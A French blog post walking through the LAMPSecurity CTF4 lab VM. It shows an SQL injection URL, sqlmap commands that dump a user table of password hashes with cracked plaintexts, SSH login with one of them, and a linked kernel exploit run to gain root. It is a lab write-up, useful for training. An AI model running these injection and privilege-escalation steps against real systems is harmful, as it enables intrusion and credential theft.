mercredi 28 mars 2012

LampSec CTF4, encore plus vite!

Comme je m'étais bien amusé hier j'ai décidé de recommencer aujourd'hui, voici la VM:

http://mirror.transact.net.au/pub/sourceforge/l/project/la/lampsecurity/CaptureTheFlag/ctf4/LAMPSecCTF.zip

Et un peu de son:



Pas très original, on tombe cette fois encore sur une injection SQL du type:



http://192.168.1.74/index.html?page=blog&title=Blog&id=-1 BLABLABL


Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /var/www/html/pages/blog.php on line 20



Même méthode que précédemment:



$ ./sqlmap.py --url "http://192.168.1.74/index.html?page=blog&title=Blog&id=1" --dbs

available databases [6]:
[*] calendar
[*] ehks
[*] information_schema
[*] mysql
[*] roundcubemail
[*] test

$ ./sqlmap.py --url "http://192.168.1.74/index.html?page=blog&title=Blog&id=1" -D ehks -T user --dump

Database: ehks
[3 tables]
+---------+
| blog |
| comment |
| user |
+---------+

$ ./sqlmap.py --url "http://192.168.1.74/index.html?page=blog&title=Blog&id=1" -D ehks -T user --dump

Database: ehks
Table: user
+---------+-----------+---------------------------------------------------+
| user_id | user_name | user_pass |
+---------+-----------+---------------------------------------------------+
| 5 | sorzek | 64d1f88b9b276aece4b0edcc25b7a434 (pacman) |
| 2 | achen | b46265f1e7faa3beab09db5c28739380 (seventysixers) |
| 3 | pmoore | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite) |
| 6 | ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1) |
| 1 | dstevens | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf) |
| 4 | jdurbin | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978) |
+---------+-----------+---------------------------------------------------+



Et la, avec une lueur d'espoir dans les yeux, je tente la connexion SSH avec le premier utilisateur... Et ça passe :/


[sorzek@ctf4 ~]$ id
uid=504(sorzek) gid=504(sorzek) groups=100(users),504(sorzek) context=user_u:system_r:unconfined_t

[sorzek@ctf4 ~]$ uname -a
Linux ctf4.sas.upenn.edu 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux



On file direct chercher l'exploit qui va bien : http://www.exploit-db.com/exploits/9479/



[sorzek@ctf4 ~]$ ./pwn
sh-3.1# id
uid=0(root) gid=0(root) groups=100(users),504(sorzek) context=user_u:system_r:unconfined_t



Si vous connaissez des wargames un peu plus difficiles je suis preneur :) !
Publié par

1 commentaire:

Joanelis a dit…

2 fast 2 furious ! ^^

Les vm kioptrix sont un peu plus "hard" : http://www.kioptrix.com/blog/

Je vais essayer de publier la dernière dès que mon serveur sera up.

@+

23 avril 2012 à 22:35

Enregistrer un commentaire

Inscription à : Publier les commentaires (Atom)